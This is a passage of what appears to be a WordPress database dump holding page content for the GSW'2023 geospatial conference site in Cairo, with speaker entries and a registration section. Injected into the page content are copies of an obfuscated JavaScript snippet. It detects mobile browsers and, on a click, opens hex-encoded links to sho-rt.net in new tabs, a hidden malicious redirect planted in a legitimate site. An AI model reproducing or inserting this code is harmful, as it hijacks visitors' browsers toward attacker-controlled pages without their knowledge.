)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-14 21:37:59','2022-10-14 21:37:59','',2167,'https://gsw2023.com/?p=2854',0,'revision','',0),
(2855,1,'2022-10-14 21:39:43','2022-10-14 21:39:43','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 